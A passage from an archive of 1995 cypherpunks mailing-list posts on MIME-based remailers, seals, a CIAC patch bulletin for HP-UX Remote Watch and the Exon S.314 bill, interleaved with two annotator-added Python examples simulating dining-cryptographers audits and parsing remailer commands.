andrew
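A simulation of the audit described in the message above, added here as an example and not code from the post. A trusted dealer with SHA-256 commitments stands in for the mental poker deal (the post notes that some trust in the dealer is needed); all function names and the sample message value are assumptions.

```python
import hashlib
import secrets
from itertools import combinations


def commit(nonce: bytes, token: str) -> str:
    """Hash commitment to one card; the random nonce hides blank vs. transmit."""
    return hashlib.sha256(nonce + token.encode()).hexdigest()


def deal(n: int, holder: int):
    """Trusted dealer: one TRANSMIT card, n-1 BLANK cards.
    Returns the private cards and the sorted public commitment list."""
    cards = [(secrets.token_bytes(16), "TRANSMIT" if i == holder else "BLANK")
             for i in range(n)]
    public = sorted(commit(nonce, tok) for nonce, tok in cards)
    return cards, public


def shared_flips(n: int, bits: int):
    """One secret `bits`-wide coin-flip pad per pair: flips[i][j] == flips[j][i]."""
    flips = [dict() for _ in range(n)]
    for i, j in combinations(range(n), 2):
        flips[i][j] = flips[j][i] = secrets.randbits(bits)
    return flips


def announce(my_flips: dict, message: int = 0) -> int:
    """A participant's broadcast: XOR of all its pads, plus the message if sending."""
    out = message
    for pad in my_flips.values():
        out ^= pad
    return out


def audit_tokens(revealed: dict, public: list):
    """revealed maps participant -> (nonce, token), or None for a refusal.
    Each opened card must match a distinct published commitment.
    Returns (valid transmit-token holders, participants removed from the net)."""
    unused = list(public)
    holders, expelled = [], []
    for p, card in sorted(revealed.items()):
        c = commit(*card) if card else None
        if c in unused:
            unused.remove(c)              # a commitment can be claimed only once
            if card[1] == "TRANSMIT":
                holders.append(p)
        else:
            expelled.append(p)            # refused, forged, or duplicated a card
    return holders, expelled


def audit_flips(flips: list, announced: list, holder: int):
    """Everyone has revealed their flips: list participants whose pads disagree
    with a peer's, or whose broadcast is not the XOR of their own pads."""
    bad = set()
    for i, j in combinations(range(len(flips)), 2):
        if flips[i].get(j) != flips[j].get(i):
            bad.update((i, j))
    for p in range(len(flips)):
        if p != holder and announce(flips[p]) != announced[p]:
            bad.add(p)
    return sorted(bad)


def run_round(n=5, holder=2, disruptor=None, bits=32, message=0x48454C4F):
    """One round: deal tokens, broadcast, then run both audits."""
    cards, public = deal(n, holder)
    flips = shared_flips(n, bits)
    announced = [announce(flips[p], message if p == holder else 0)
                 for p in range(n)]
    if disruptor is not None:
        announced[disruptor] ^= secrets.randbits(bits) | 1   # non-zero jamming
    result = 0
    for a in announced:
        result ^= a                       # pads cancel pairwise
    holders, expelled = audit_tokens({p: cards[p] for p in range(n)}, public)
    culprits = audit_flips(flips, announced, holders[0]) if len(holders) == 1 else []
    return result, holders, expelled, culprits


if __name__ == "__main__":
    print(run_round())                    # clean round
    print(run_round(disruptor=4))         # jammed round, disruptor identified
```

Revealing the flips identifies the token holder as the sender for that round, which is why the post leaves the demand to the holder's discretion.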




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 08:49:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502071636.IAA15674@jobe.shell.portal.com>
Message-ID: <9502071649.AA08393@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I was actually contemplating going a bit further, and making the core
message not a "text/plain" but a Message/Rfc822, but without a "From",
or perhaps with a "From: somethingfictitious". I also wouldn't declare
the contents to be a multipart -- rather I'd have them be a security
multiparts container that in turn contained a multipart containing a
remail commands section and another security multipart...

Hal says:
> From: "Perry E. Metzger" <perry@imsi.com>
> > 
> >     I'd say that it would work far better if things were changed to MIME
> >     formats. You would send a message by recursively encapsulating your
> >     message to be remailed inside a MIME message. Simple and clean...
> 
> Here is an example of how such a message might look.  I created it using
> the safe-tcl scripting language.  Interestingly, safe-tcl can to a
> considerable extent be considered a tcl extension to let you work easily
> with mime messages.  It makes it easy to create and parse them.
> 
> The whole message could be encrypted and marked with the "Encrypted: PGP"
> header as we do now, or when the new PGP/MIME standard is finalized then
> that could be followed.
> 
> I made up two new content types for this, one to hold the composite
> multipart message, and one to hold the remailer commands themselves.
> Although these types are not implemented, I think it would be very easy
> to make a remailer that would use this structure, built out of safe-tcl.
> (The batching and latency would not be trivial, but the basic remailing
> would be easy.)
> 
> Hal
> 
> > To: hfinney@shell.portal.com
> > Subject: No subject
> > Mime-Version: 1.0
> > Content-Type: multipart/remail; boundary="----- =_792174086"
> > Content-ID: <1471.792173861.3@cryo>
> >  
> > ------- =_792174086
> > Content-Type: application/remail-commands
> > Content-ID: <1471.792173861.1@cryo>
> > 
> > Latency: 2 hours
> > Minimum-Batch-Size: 5 messages
> > Anon-Send-To: cypherpunks@toad.com
> > Subject: Example of remailed message
> >  
> > ------- =_792174086
> > Content-Type: text/plain
> > Content-ID: <1471.792173861.2@cryo>
> >  
> > This is a message which is being sent to the mailing list.
> > It is being remailed via a MIME-based structure where two new content types
> > are defined: multipart/remail and application/remail-commands.  The
> > multipart/remail type is supposed to be composed of two parts, the
> > application/remail-commands part which has remailer commands, and the
> > other part which is the "payload" to be remailed.
> >  
> > ------- =_792174086--
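A sketch of how a remailer could parse and validate the multipart/remail structure quoted above, added here as an example; it is not Hal's safe-tcl code or any existing remailer. The two content types and the command names come from the quoted message; the function names, the fail-closed allow-list, the unit grammar, the text/plain-only payload and the example.invalid addresses are assumptions.

```python
import re
from email import message_from_string
from email.message import EmailMessage
from email.parser import HeaderParser

# Constructed sample modelled on the quoted message. A From: line is added to
# show that sender-identifying headers are not copied to the outgoing mail.
SAMPLE = """\
From: alice@example.invalid
To: remailer@example.invalid
Subject: No subject
Mime-Version: 1.0
Content-Type: multipart/remail; boundary="----- =_792174086"

------- =_792174086
Content-Type: application/remail-commands

Latency: 2 hours
Minimum-Batch-Size: 5 messages
Anon-Send-To: cypherpunks@toad.com
Subject: Example of remailed message

------- =_792174086
Content-Type: text/plain

This is the payload to be remailed.

------- =_792174086--
"""

ALLOWED = {"latency", "minimum-batch-size", "anon-send-to", "subject"}
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
UNIT_SECONDS = {"second": 1, "minute": 60, "hour": 3600}


def parse_commands(text):
    """Parse the application/remail-commands body; reject anything unexpected."""
    hdrs = HeaderParser().parsestr(text)
    if hdrs.get_payload().strip():
        raise ValueError("unparsed text in remail-commands part")
    raw = {}
    for name, value in hdrs.items():
        key = name.lower()
        if key not in ALLOWED:
            raise ValueError(f"unknown remail command: {name}")
        if key in raw:
            raise ValueError(f"duplicate remail command: {name}")
        if "\n" in value or "\r" in value:
            raise ValueError(f"folded value in {name}")   # header-injection guard
        raw[key] = value.strip()
    if not ADDRESS.fullmatch(raw.get("anon-send-to", "")):
        raise ValueError("Anon-Send-To must be exactly one address")
    cmds = {"to": raw["anon-send-to"], "subject": raw.get("subject", ""),
            "latency_seconds": 0, "min_batch": 1}
    if "latency" in raw:
        m = re.fullmatch(r"(\d{1,4}) (second|minute|hour)s?", raw["latency"])
        if not m:
            raise ValueError("bad Latency value")
        cmds["latency_seconds"] = int(m[1]) * UNIT_SECONDS[m[2]]
    if "minimum-batch-size" in raw:
        m = re.fullmatch(r"(\d{1,3}) messages?", raw["minimum-batch-size"])
        if not m:
            raise ValueError("bad Minimum-Batch-Size value")
        cmds["min_batch"] = int(m[1])
    return cmds


def process_remail(raw_message):
    """Return (commands, outgoing message) for one multipart/remail input."""
    msg = message_from_string(raw_message)
    if msg.get_content_type() != "multipart/remail" or not msg.is_multipart():
        raise ValueError("not a multipart/remail message")
    parts = msg.get_payload()
    if len(parts) != 2:
        raise ValueError("multipart/remail must have exactly two parts")
    cmd_part, body_part = parts
    if cmd_part.get_content_type() != "application/remail-commands":
        raise ValueError("first part must be application/remail-commands")
    if body_part.get_content_type() != "text/plain":
        raise ValueError("this example forwards text/plain payloads only")
    cmds = parse_commands(cmd_part.get_payload())
    # Build the outgoing mail from scratch: nothing from the incoming headers
    # (From, Message-ID, Content-ID, Received) is carried over.
    out = EmailMessage()
    out["To"] = cmds["to"]
    if cmds["subject"]:
        out["Subject"] = cmds["subject"]
    out.set_content(body_part.get_payload())
    return cmds, out


if __name__ == "__main__":
    commands, outgoing = process_remail(SAMPLE)
    print(commands)
    print(outgoing.as_string())
```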




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 12:27:56 PST
To: perry@imsi.com
Subject: Seals and Sealing Waxes
Message-ID: <ab5d0f8b040210047448@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Perry says:

>root says:
>> This is the same problem that arose with the original idea of seals once
>> the skills of metalworking became common enough. By the 1500's it was
>> nearly impossible to keep a seal confidential more than a few weeks until
>> somebody got an impression and built a copy.
>
>Seals were duplicatable from the start. You just needed clay and a
>seal made with the original if you wanted to forge them -- fairly
>common stuff. Signatures have been duplicatable from the start, too.

"All crypto is economics," and this is what made seals and sealing wax so
useful for so long. Saying "seals were duplicatable from the start" does
not mean this feat was easy, even if technically possible.

In fact, the fine details produced by a good seal are hard to exactly
emulate with a copy. Even on a two-dimensional surface. And with the advent
of three-dimensional surfaces, which sealing wax made possible, the fine
detail of a good seal was in fact very hard to forge.

Not impossible, but very costly with the technology of the day. Or even the
technology of _today_. After all, paper currency is largely based on seal
technology, with various embossing, printing, etc. methods used (on special
paper) that remain fairly hard to duplicate.

(Not impossible, and counterfeiting flourishes. It's all about economics,
and I'm only disputing the claims of easiness. As an added note,
transactions in the Far East are still often "sealed" with "chop marks,"
carved stamps that are uniquely associated with persons or groups.)

>Signatures and seals are NOT truly authenticating technologies. They
>are just a legal mechanism for an entity to demonstrate that it has
>read and agreed to the terms on a document. It was always assumed that
>someone might forge a signature, which is why if you had a document
>where you cared that people might disclaim their signature, you got
>people who could testify to the signature to witness the signing.

I think this understates the importance of signatures and seals in these
earlier times.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 7 Feb 95 09:58:40 PST
To: cypherpunks@toad.com
Subject: CIAC Bulletin F-10:  HP-UX Remote Watch
Message-ID: <199502071758.MAA14611@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Reformatted for mailing by <jya@pipeline.com>.]


   Sender: ciac-bulletin@cheetah.llnl.gov
   Subject: CIAC Bulletin F-10: HP-UX Remote Watch


       _____________________________________________________
                   The U.S. Department of Energy
               Computer Incident Advisory Capability
                     ___  __ __    _     ___
                    /       |     /_\   /
                    \___  __|__  /   \  \___
       _____________________________________________________

                       INFORMATION BULLETIN

                        HP-UX Remote Watch


   February 6, 1995 1200 PST                     Number F-10
   _________________________________________________________

   PROBLEM:       Security vulnerabilities in HP-UX Remote
                  Watch can be used to increase access
                  privileges of users.

   PLATFORMS:     HP 9000 series 300/400s and 700/800s, for
                  HP-UX versions 8.x and 9.x

   DAMAGE:        User can increase their access privileges.

   SOLUTION:      Apply appropriate vendor patch as described
                  below.
   _________________________________________________________

   VULNERABILITY
   ASSESSMENT:    The security vulnerability in HP-UX Remote
                  Watch can be used to increase a user's
                  access privileges which may result in
                  system compromise.  CIAC urges affected
                  sites to install the appropriate
                  security patch as soon as possible.
   _________________________________________________________

        Critical Information about HP-UX Remote Watch

   CIAC has obtained information from Hewlett Packard
   regarding a new security vulnerability in Remote Watch
   contained in the WATCH-RUN fileset for releases of HP-UX. 
   Appendix I provides detailed patch information for the HP
   Remote Watch vulnerability.


   The document /pub/ciac/bulletin/f-fy95/hppatchs.txt has
   been updated to reflect this bulletin.  The hppatchs.txt
   document contains the entire list of all HP Bulletins and
   patches and is available on our FTP server ciac.llnl.gov.


   HP has an automatic server to allow patches and other
   security information to be retrieved over the Internet.  To
   utilize this server, send an e-mail message to
   support@support.mayfield.hp.com.  The subject line of the
   message is ignored and the body (text) of the message
   should contain the words


   send XXXX


   where XXXX is the identifier for the information you want
   retrieved.  For example, to retrieve the patch PHSS_4834,
   the message would be "send PHSS_4834".


   Other information that can be retrieved includes the HP
   SupportLine mail service user's guide (send guide.txt), the
   readme file for a patch and the original HP bulletin (send
   doc HPSBUX9501-020).


   HP also has a World Wide Web server to browse and retrieve
   bulletins and patches.  To utilize this server, use a WWW
   client and connect to http://support.mayfield.hp.com.


   IMPORTANT NOTE: Hewlett Packard updates patches
   periodically.  These updates are not reflected in the text
   of each HP bulletin.  The overview presented here contains
   current information on the patches available at the time of
   the release of this CIAC bulletin.  If you request an
   updated patch, when you try to retrieve the patch you will
   receive a message stating that the patch is obsolete and
   the name of the patch which supersedes it.


   Hewlett Packard has made sum and MD5 checksums available
   for their patches and for their security bulletins.  See
   the detailed explanation for HPSBUX9408-016 in CIAC
   bulletin F-02 for information on how to access and utilize
   these checksums.

   _________________________________________________________

   CIAC wishes to thank Hewlett Packard for the information
   contained in this bulletin.
   _________________________________________________________

   CIAC is the computer security incident response team for
   the U.S. Department of Energy.  Services are available free
   of charge to DOE and DOE contractors.


   DOE and DOE contractor sites can contact CIAC at:

        Voice:   510-422-8193
        FAX:     510-423-8002
        STU-III: 510-423-2604
        E-mail:  ciac@llnl.gov


   Previous CIAC notices, anti-virus software, and other
   information are available on the Internet via anonymous FTP
   from ciac.llnl.gov (IP address 128.115.19.53).


   CIAC has several self-subscribing mailing lists for
   electronic publications:

   1.   CIAC-BULLETIN for Advisories, highest priority - time
        critical information, and Bulletins, important
        computer security information;

   2.   CIAC-NOTES for Notes, a collection of computer
        security articles;

   3.   SPI-ANNOUNCE for official news about Security Profile
        Inspector (SPI) software updates, new features,
        distribution and availability;

   4.   SPI-NOTES, for discussion of problems and solutions
        regarding the use of SPI products.


   Our mailing lists are managed by a public domain software
   package called ListProcessor, which ignores E-mail header
   subject lines. To subscribe (add yourself) to one of our
   mailing lists, send requests of the following form:


   subscribe list-name LastName, FirstName PhoneNumber


   as the E-mail message body, substituting CIAC-BULLETIN,
   CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for "list-name" and
   valid information for "LastName" "FirstName" and
   "PhoneNumber."  Send to: ciac-listproc@llnl.gov not to:
   ciac@llnl.gov


   e.g.,

   subscribe ciac-notes O'Hara, Scarlett 404-555-1212 x36

   subscribe ciac-bulletin O'Hara, Scarlett 404-555-1212 x36


   You will receive an acknowledgment containing address and
   initial PIN, and information on how to change either of
   them, cancel your subscription, or get help.
   _________________________________________________________

   PLEASE NOTE: Many users outside of the DOE and ESnet
   computing communities receive CIAC bulletins. If you are
   not part of these communities, please contact your agency's
   response team to report incidents. Your agency's team will
   coordinate with CIAC. The Forum of Incident Response and
   Security Teams (FIRST) is a world-wide organization. A list
   of FIRST member organizations and their constituencies can
   be obtained by sending E-mail to first-request@first.org
   with an empty subject line and a message body containing
   the line: send first-contacts.


   This document was prepared as an account of work sponsored
   by an agency of the United States Government. Neither the
   United States Government nor the University of California
   nor any of their employees, makes any warranty, expressed
   or implied, or assumes any legal liability or
   responsibility for the accuracy, completeness, or
   usefulness of any information, product, or process
   disclosed, or represents that its use would not infringe
   privately owned rights. Reference herein to any specific
   commercial products, process, or service by trade name,
   trademark manufacturer, or otherwise, does not necessarily
   constitute or imply its endorsement, recommendation, or
   favoring by the United States Government or the University
   of California. The views and opinions of authors expressed
   herein do not necessarily state or reflect those of the
   United States Government nor the University of California,
   and shall not be used for advertising or product
   endorsement purposes.

   _________________________________________________________

        Appendix I:  Details of HP-UX Remote Watch Bulletin


   HPSBUX9510-020: HP-UX Remote Watch dated January 31, 1995


   This vulnerability can allow users to increase their access
   privileges which may result in system compromise.  All HP
   300/400 and 700/800 series machines running HP-UX 8.x or
   9.x which have Remote Watch installed are affected.


   The patch to install depends on which operating system
   version and machine series you are currently using.  Use
   the following table to determine which patch to retrieve
   and install:


   Operating System      Series    Apply patch

   HP-UX 8.x             800       PHSS_5185
   HP-UX 9.x             800       PHSS_5136
   HP-UX 8.x             700       PHSS_5180
   HP-UX 9.x             700       PHSS_5107
   HP-UX 8.x             300/400   PHSS_5168
   HP-UX 9.x             300/400   PHSS_5120


   Obtain necessary patches, and install per the installation
   instructions included with the patches.


   After the patch is installed, be sure to examine
   /tmp/update.log for any relevant WARNINGs or ERRORs.  This
   can be done by typing "tail -60 /tmp/update.log | more",
   then paging through the screens via the space bar, looking
   for WARNING or ERROR messages.


   [END]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Tue, 7 Feb 95 10:14:44 PST
To: cypherpunks@toad.com
Subject: testing the waters re: new crypto FTP site
Message-ID: <v01510101ab5d68bca64c@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm considering setting up a new FTP site dedicated to cryptography
and security software, code, and information, with particular emphasis
on personal microcomputer (even more particular emphasis on macintosh :)
) security.

I'm sending this message to test the waters regarding how useful such
a new site would be. I considered setting up a new PGP keyserver
earlier, but the consensus of net.opinion when I asked about it seemed
to be that there were plenty of keyservers that worked fine already, so
I abandoned the idea. :-) Does anyone have an opinion they could send me
regarding whether such a new site would be useful / would not be too
useful? I'm looking to do something that would actually be useful to the
net.community.

For example, I'd like to scavenge the various crypto archives as well
as public archives for programs to password-protect hard drives, encrypt
files and volumes, monitor AppleShare access, do steganography, and so
on. Of course, there are the old standbys as well: PGP, cryptanalysis,
dictionaries, password crackers, interesting documentation and clippings
from EMAIL and net.posts from people who know their stuff, and so on.

The crypto stuff, folks would have to send me email establishing legal
eligibility, whereupon I'd create for them a non-anonymous account. The
non-crypto stuff would be in directories accessible to anonymous FTP
login.

This sounds like a lot of fun and I'd enjoy running it. However, if,
like my keyserver idea, I wouldn't be doing anything really new or
useful, it might just be a way for me to spend lots of time not getting
much useful stuff done. :-)

In particular, mail saying "Yeah, that sounds cool, I'd use it" would
mean potential users. No mail to this effect would mean folk already
have sufficient FTP resources. Any opinions appreciated.

Tom
tjb@acpub.duke.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 13:28:59 PST
To: ktk@anemone.corp.sgi.com (Katy Kislitzin)
Subject: CFP, Cypherpunks, and Crypto
In-Reply-To: <199502071830.KAA29964@anemone.corp.sgi.com>
Message-ID: <199502072127.NAA28248@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Katy Kislitzin wrote:

> > From: Adam Shostack <adam@bwh.harvard.edu>
>  > Is the march meeting scheduled yet?  I'm trying to plan to be out for
>  > both CFP & the cypherpunks meeting, but have paid no attention to when
>  > they're held, since I live on the wrong coast to attend most of them.
...
>  We have the usual 2nd Saturday (March 12) meeting planned, but I
>  *definitely* think cpunks should do something around the cfp
>  conference.  last year we did an informal in-the-hotel-halls meeting,
>  but since this cfp is in the bay area....  I propose keeping the
> regular March and April mtgs, and adding a cpunks dinner &&|| BOF at
> cfp.  other ideas?

The Computers, Freedom, and Privacy Conference is to be held 29-31
March 1995, at the Marriott in Burlingame, CA (SF Airport). Details
have been distributed recently to most of the usual places.

I'll be on Michael Froomkin's "Crypto" panel on Friday, 31 March.
Along with Stewart Baker (ex-NSA, famous for "Clipper opponents just
getting revenge for missing Woodstock"), Steve Walker (TIS), Phil
Karn, a Microsoft guy, and maybe others. Details should be available.

So I'm all for a Cypherpunks BOF ("birds of a feather," in case this
term is new to you....basically, a special interest group gathering)
or dinner. Maybe more than one?

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Tue, 7 Feb 95 05:32:28 PST
To: cypherpunks@toad.com
Subject: RE: Re: lwall
Message-ID: <9502071330.AA03045@pero>
MIME-Version: 1.0
Content-Type: text/plain


Someone at Berkeley's been a reet tit,
haven't they..

--
Richard

> ------------------------------- your post follows ----------------------------
> Path: netnet2.netnet.net!news.sprintlink.net!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
> Subject: lwall
> Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
> NNTP-Posting-Host: ack.berkeley.edu
> Organization: cypherpunks
> Lines: 2
> From: cypherpunks@toad.com
> Distribution: world
> Newsgroups: alt.test
> Date: 6 Feb 1995 19:34:19 GMT
> 
> test
> test
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 7 Feb 95 10:41:14 PST
To: jya@pipeline.com (John Young)
Subject: Re: CIAC Bulletin F-10:  HP-UX Remote Watch
In-Reply-To: <199502071758.MAA14611@pipe3.pipeline.com>
Message-ID: <199502071840.NAA05395@freud.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Since CERT & CIAC have public lists for this stuff, and since everyone
who wants to get these advisories already does, please post at most a
pointer to the things.

Adam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 7 Feb 95 11:13:35 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Corporate Fascism, Rand, Greens, Oh My!
Message-ID: <199502071907.AA08674@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:

>Make no mistake about it, strong crypto, what I call crypto anarchy,
>will have as great an effect on corporate sizes, structures, and
>behaviors as it will have on governments. Maybe more of an effect.

For those of you who want a solid discussion of just *how* computer
technology (let alone crypto) downsizes companies see the Economist article
"The Incredible Shrinking Company" thoughtfully HTMLized by yours truly:

http://www.ios.com/~lroth/clips/bussiz.html

DCF

- --
If it's on your hard drive (and of interest to others) it should be on the
WEB.  Post something on your WEB page every day.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Tue, 7 Feb 95 14:44:29 PST
To: cypherpunks@toad.com
Subject: ssl-talk@netscape.com
Message-ID: <9502071444.ZM25840@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There is now a new mailing list, called "ssl-talk@netscape.com" for people
wishing to discuss SSL and its implementations.

It uses the "smartlist" stuff, so send your (un)subscription request in the
message subject line.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog@wookie.net (slowdog)
Date: 7 Feb 1995 14:58:36 GMT
Subject: URGENT - What S.314 Would Do
Message-ID: <3h81qs$ee0@dockmaster.phantom.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Article crossposted from comp.org.cpsr.talk,comp.org.cpsr.talk,misc.legal.comp ]
[ Author was slowdog (slowdog@wookie.net) ]
[ Posted on 7 Feb 1995 14:56:15 GMT ]

The following is what Senator Exon's bill (S.314) would do to the 
Communications Act of 1934. The text in [brackets] is what is being 
deleted or changed. What exists as plain text outside those brackets is 
how the new law will look.

Read carefully. There are indeed implications for Internet service 
providers in terms of their responsibility under the law for the content 
of their systems and services.


-------------------------------------------------------------------

   47 USC Sec. 223
   
   TITLE 47
   CHAPTER 5
   SUBCHAPTER II
   
   
   Sec. 223. [Obscene or harassing telephone calls in the District of
   Columbia or in interstate or foreign communications] Obscene or
   harassing utilization of telecommunications devices and facilities
   in the District of Columbia or in interstate or foreign
   communications
   
   
   (a) Prohibited acts generally
   
   Whoever -
   
   (1) in the District of Columbia or in interstate or foreign
   communication by means of [telephone] telecommunications
   device -
   
   (A) [makes any comment, request, suggestion or proposal] 
   makes, transmits, or otherwise makes available any comment,
   request, suggestions, proposal, image, or other communication
   which is obscene, lewd, lascivious, filthy, or indecent;

   (B) [makes a telephone call, whether or not conversation
   ensues, without disclosing his identity and with intent to
   annoy, abuse, threaten, or harass any person at the called
   number] makes a telephone call or utilizes a telecommunications
   device, whether or not conversation or communications ensues,
   without disclosing his identity with intent to annoy, abuse,
   threaten, or harass any person at the called number or who
   receives the communication;
   
   (C) makes or causes the telephone of another repeatedly or   
   continuously to ring, with intent to harass any person at the
   called number; or
   
   (D) [makes repeated telephone calls, during which conversation
   ensues, solely to harass any person at the called number; or]
   makes repeated telephone calls or repeatedly initiates
   communication with a telecommunications device, during which
   conversation or communication ensues, solely to harass any
   person at the called number or who receives the communication;
   or
   
   (2) knowingly permits any [telephone] telecommunications facility
   under his control to be used for any purpose prohibited by this
   section, shall be fined not more than [$50,000] $100,000 or
   imprisoned not more than [six months] 2 years, or both.
   
   (b) Prohibited acts for commercial purposes; defense to prosecution
   
   (1) Whoever knowingly -
   
   (A) within the United States, by means of [telephone], 
   telecommunications device makes (directly or by recording device)
   any obscene communication for commercial purposes to any person, 
   regardless of whether the maker of such communication [placed the
   call] placed the call or initiated the conversation; or
   
   (B) permits any [telephone] telecommunications facility under such 
   person's control to be used for an activity prohibited by
   subparagraph (A), shall be fined in accordance with title 18 or 
   imprisoned not more than two years, or both.
   
   (2) Whoever knowingly -
   
   (A) within the United States, [by means of telephone, makes]
   by means of telecommunications device, makes, knowingly
   transmits, or knowingly makes available (directly or by recording 
   device) any indecent communication for commercial purposes which is 
   available to any person under 18 years of age or to any other person 
   without that person's consent, regardless of whether the maker of
   such communication [placed the call] placed the call or
   initiated the communication; or
   
   (B) permits any [telephone] telecommunications facility under such 
   person's control to be used for an activity prohibited by subparagraph 
   (A), shall be fined not more than [$50,000] $100,000 or imprisoned not 
   more than [six months] 2 years, or both.
   
   (3) It is a defense to prosecution under paragraph (2) of this
   subsection that the defendant restrict access to the prohibited
   communication to persons 18 years of age or older in accordance
   with subsection (c) of this section and with such procedures as the
   Commission may prescribe by regulation.
   
   (4) In addition to the penalties under paragraph (1), whoever,
   within the United States, intentionally violates paragraph (1) or
   (2) shall be subject to a fine of not more than [$50,000]
   $100,000 for each violation. For purposes of this paragraph, each
   day of violation shall constitute a separate violation.
   
   (5)(A) In addition to the penalties under paragraphs (1), (2),
   and (5), whoever, within the United States, violates paragraph (1)
   or (2) shall be subject to a civil fine of not more than [$50,000]
   $100,000 for each violation. For purposes of this paragraph, each
   day of violation shall constitute a separate violation.
   
   (B) A fine under this paragraph may be assessed either -
   
   (i) by a court, pursuant to civil action by the Commission or
   any attorney employed by the Commission who is designated by the
   Commission for such purposes, or
   
   (ii) by the Commission after appropriate administrative
   proceedings.
   
   (6) The Attorney General may bring a suit in the appropriate
   district court of the United States to enjoin any act or practice
   which violates paragraph (1) or (2). An injunction may be granted
   in accordance with the Federal Rules of Civil Procedure.
   
   (c) Restriction on access to subscribers by common carriers;
   judicial remedies respecting restrictions
   
   (1) A common carrier within the District of Columbia or within
   any State, or in interstate or foreign commerce, shall not, to the
   extent technically feasible, provide access to a communication
   specified in subsection (b) of this section from the [telephone]
   telecommunications device of any subscriber who has not previously 
   requested in writing the carrier to provide access to such 
   communication if the carrier collects from subscribers an identifiable 
   charge for such communication that the carrier remits, in whole or in 
   part, to the provider of such communication.
   
   (2) Except as provided in paragraph (3), no cause of action may
   be brought in any court or administrative agency against any common
   carrier, or any of its affiliates, including their officers,
   directors, employees, agents, or authorized representatives on
   account of -
   
   (A) any action which the carrier demonstrates was taken in good
   faith to restrict access pursuant to paragraph (1) of this
   subsection; or
   
   (B) any access permitted -
   
   (i) in good faith reliance upon the lack of any
   representation by a provider of communications that
   communications provided by that provider are communications
   specified in subsection (b) of this section, or
   
   (ii) because a specific representation by the provider did
   not allow the carrier, acting in good faith, a sufficient
   period to restrict access to communications
   described in subsection (b) of this section.
   
   (3) Notwithstanding paragraph (2) of this subsection, a provider
   of communications services to which subscribers are denied access
   pursuant to paragraph (1) of this subsection may bring an action
   for a declaratory judgment or similar action in a court. Any such
   action shall be limited to the question of whether the
   communications which the provider seeks to provide fall within the
   category of communications to which the carrier will provide access
   only to subscribers who have previously requested such access.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xpat Autoresponder <autoreply@xpat.postech.ac.kr>
Date: Mon, 6 Feb 95 22:24:32 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502070619.PAA12524@xpat.postech.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine for
the Pohang University of Science and Technology in Pohang, South Korea.
The Xpat newsadmins can be reached via e-mail at usenet@xpat.postech.ac.kr.
Any reply to this message will be dropped into the bit bucket, and never be
seen by a human.  Please note that we do not offer news access to sites
outside of our organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
